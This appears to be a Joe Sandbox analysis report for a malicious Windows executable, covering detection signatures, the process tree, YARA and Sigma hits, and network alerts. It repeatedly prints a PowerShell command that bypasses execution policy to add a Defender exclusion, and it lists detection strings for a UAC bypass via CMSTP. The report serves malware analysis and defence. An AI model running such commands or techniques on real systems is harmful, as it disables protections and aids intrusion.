Edit tour

Windows Analysis Report
MiJZ3z4t5K.exe

Overview

General Information

Sample name:	MiJZ3z4t5K.exe renamed because original name is a hash value
Original sample name:	0a5d8601aff94ec2960ba5487d120e4f2952bf8b8cf9cd36873bf941721d67c4.exe
Analysis ID:	1569043
MD5:	7184ee339fc221d742067dccff4cdfe2
SHA1:	0019c9c084a2756b4ec962d92ce56c526527df31
SHA256:	0a5d8601aff94ec2960ba5487d120e4f2952bf8b8cf9cd36873bf941721d67c4
Tags:	exeuser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Deletes files inside the Windows folder

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

MiJZ3z4t5K.exe (PID: 4824 cmdline: "C:\Users\user\Desktop\MiJZ3z4t5K.exe" MD5: 7184EE339FC221D742067DCCFF4CDFE2)

powershell.exe (PID: 5412 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4996 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

AppsLo.exe (PID: 2032 cmdline: "C:\Windows\Temp\AppsLo.exe" MD5: B0AD260D058A7F4F299B4BBC7F876799)

AppsLo.exe (PID: 6672 cmdline: "C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe" -burn.clean.room="C:\Windows\Temp\AppsLo.exe" -burn.filehandle.attached=524 -burn.filehandle.self=532 MD5: 5DEBD32329500518D4F21225DCB64E43)

thunderbird.exe (PID: 5780 cmdline: "C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe" MD5: A9D830B99ABEA315C465A440C4AA1B94)

thunderbird.exe (PID: 5292 cmdline: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe MD5: A9D830B99ABEA315C465A440C4AA1B94)

cmd.exe (PID: 1464 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Qjsync.exe (PID: 4992 cmdline: C:\Users\user\AppData\Local\Temp\Qjsync.exe MD5: 967F4470627F823F4D7981E511C9824F)

svchost.exe (PID: 6868 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

thunderbird.exe (PID: 2324 cmdline: "C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe" MD5: A9D830B99ABEA315C465A440C4AA1B94)

cmd.exe (PID: 2832 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

thunderbird.exe (PID: 5848 cmdline: "C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe" MD5: A9D830B99ABEA315C465A440C4AA1B94)

cmd.exe (PID: 1492 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000012.00000002.3047889752.0000000003220000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000017.00000002.3220573413.0000000003E5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.2459567914.0000000003EA5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.2636199629.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000010.00000002.2989949247.0000000003EB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000012.00000002.3048517173.00000000051BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000002.3341449568.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 1464	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Qjsync.exe PID: 4992	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.cmd.exe.32207f8.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.cmd.exe.32207f8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x10f28:$s2: Elevation:Administrator!new:
18.2.cmd.exe.51c3a00.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.cmd.exe.51c3a00.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
11.2.cmd.exe.53b7acd.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.cmd.exe.53b7acd.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
24.2.cmd.exe.50bba00.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.50bba00.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
18.2.cmd.exe.52096cd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.cmd.exe.52096cd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
24.2.cmd.exe.51016cd.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.51016cd.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
24.2.cmd.exe.5100acd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.cmd.exe.5100acd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
18.2.cmd.exe.5208acd.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.cmd.exe.5208acd.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
17.2.Qjsync.exe.26ebaed.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.Qjsync.exe.26ebaed.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f2a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f32d:$s1: CoGetObject 0x25f286:$s2: Elevation:Administrator!new:
17.2.Qjsync.exe.26a6a20.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.Qjsync.exe.26a6a20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
11.2.cmd.exe.5372a00.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.cmd.exe.5372a00.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a436f:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a43fa:$s1: CoGetObject 0x2a4353:$s2: Elevation:Administrator!new:
17.2.Qjsync.exe.26ec6ed.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.Qjsync.exe.26ec6ed.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
11.2.cmd.exe.53b86cd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.cmd.exe.53b86cd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e6a2:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e72d:$s1: CoGetObject 0x25e686:$s2: Elevation:Administrator!new:
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MiJZ3z4t5K.exe", ParentImage: C:\Users\user\Desktop\MiJZ3z4t5K.exe, ParentProcessId: 4824, ParentProcessName: MiJZ3z4t5K.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5412, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MiJZ3z4t5K.exe", ParentImage: C:\Users\user\Desktop\MiJZ3z4t5K.exe, ParentProcessId: 4824, ParentProcessName: MiJZ3z4t5K.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5412, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MiJZ3z4t5K.exe", ParentImage: C:\Users\user\Desktop\MiJZ3z4t5K.exe, ParentProcessId: 4824, ParentProcessName: MiJZ3z4t5K.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5412, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MiJZ3z4t5K.exe", ParentImage: C:\Users\user\Desktop\MiJZ3z4t5K.exe, ParentProcessId: 4824, ParentProcessName: MiJZ3z4t5K.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5412, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 6868, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITB5CE.tmp

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MiJZ3z4t5K.exe", ParentImage: C:\Users\user\Desktop\MiJZ3z4t5K.exe, ParentProcessId: 4824, ParentProcessName: MiJZ3z4t5K.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 5412, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6868, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T11:39:59.350316+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	49708	147.45.44.131	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\smomwacaueqiut	ReversingLabs: Detection: 36%
Source: C:\Windows\Temp\AppsLo.exe	ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\smomwacaueqiut

Joe Sandbox ML: detected

Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008BA0BB DecryptFileW,	6_2_008BA0BB
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008DFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	6_2_008DFA62
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008B9E9E DecryptFileW,DecryptFileW,	6_2_008B9E9E
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F6A0BB DecryptFileW,	7_2_00F6A0BB
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F8FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,	7_2_00F8FA62
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F69E9E DecryptFileW,DecryptFileW,	7_2_00F69E9E

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 18.2.cmd.exe.32207f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.cmd.exe.51c3a00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cmd.exe.53b7acd.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.50bba00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.cmd.exe.52096cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.51016cd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5100acd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.cmd.exe.5208acd.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Qjsync.exe.26ebaed.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Qjsync.exe.26a6a20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cmd.exe.5372a00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Qjsync.exe.26ec6ed.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cmd.exe.53b86cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3047889752.0000000003220000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3220573413.0000000003E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2459567914.0000000003EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2636199629.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2989949247.0000000003EB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3048517173.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3341449568.00000000050B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qjsync.exe PID: 4992, type: MEMORYSTR

Source: unknown

HTTPS traffic detected: 52.222.214.90:443 -> 192.168.2.6:49737 version: TLS 1.2

Source: MiJZ3z4t5K.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: AppsLo.exe, 00000006.00000000.2322329895.00000000008EB000.00000002.00000001.01000000.00000008.sdmp, AppsLo.exe, 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmp, AppsLo.exe, 00000007.00000002.2464442789.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmp, AppsLo.exe, 00000007.00000000.2326342375.0000000000F9B000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nss\smime\smime3.pdb source: thunderbird.exe, 00000008.00000003.2452218692.0000000003143000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\nsprpub\lib\libc\src\plc4.pdb source: thunderbird.exe, 00000008.00000003.2452098202.0000000003142000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\xpcom\build\xpcom_core.pdb source: AppsLo.exe, 00000007.00000003.2335434052.0000000001186000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2458651794.0000000003140000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e:\builds\tinderbox\Tb-Mozilla1.8-Release\WINNT_5.0_Depend\mozilla\js\src\js3250.pdb source: thunderbird.exe, 00000008.00000003.2451244929.0000000003143000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Qjsync.exe, 00000011.00000002.3022572775.0000000003CB6000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3028506942.0000000005EBB000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3024927145.00000000052B0000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3023518128.00000000046B7000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3029133169.00000000064B1000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3023737831.00000000048BD000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3022953947.00000000040B3000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021471019.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3020860602.0000000002255000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3029759154.00000000068B0000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3030087680.0000000006ABA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\bb\ke-win-x86-r\edit-6.1\build\release\scintilla\bin\SciLexer.pdb source: AppsLo.exe, 00000007.00000002.2465927641.0000000010078000.00000002.00000001.01000000.0000000C.sdmp
